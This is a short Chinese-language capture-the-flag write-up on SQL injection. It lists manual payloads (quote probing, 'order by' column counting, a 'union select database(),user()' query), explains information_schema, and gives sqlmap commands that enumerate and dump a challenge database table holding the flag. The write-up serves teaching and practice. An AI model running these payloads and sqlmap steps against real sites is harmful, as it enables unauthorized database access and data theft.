知识点
sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入
通过1' order by 1#
、1' order by 2#直到确定为几列
通过联合查询 1' union select database(),user()#
进行查询
- database()将会返回当前网站所使用的数据库名字.
- user()将会返回执行当前查询的用户名.
information_schema
是 mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。
题目
存在漏洞找注入点
使用burpsuite抓包,找到注入点=>通过post传递参数
因此不能通过sqlmap扫url注入,而是通过sqlmap扫数据包注入
将数据包保存成txt文件---/home/kali/Downloads/id1.txt
4.使用sqlmap进行注入
#获取所有数据库名称
sqlmap.py -r "/home/kali/Downloads/id1.txt" -p id --dbs
得到mysql注入漏洞,且有四个数据库,其中skctf嫌疑最大,继续对他操作
#获取skctf数据库的所有表
sqlmap -r "/home/kali/Downloads/id1.txt" -p id -D skctf --tables
#获取数据库skctf表fl4g的所有列名称
sqlmap -r "/home/kali/Downloads/id1.txt" -p id -D skctf -T fl4g --columns
#获取数据库skctf表fl4g列skctf_flag的内容
sqlmap -r "/home/kali/Downloads/id1.txt" -p id -D skctf -T fl4g -C skctf_flag --dump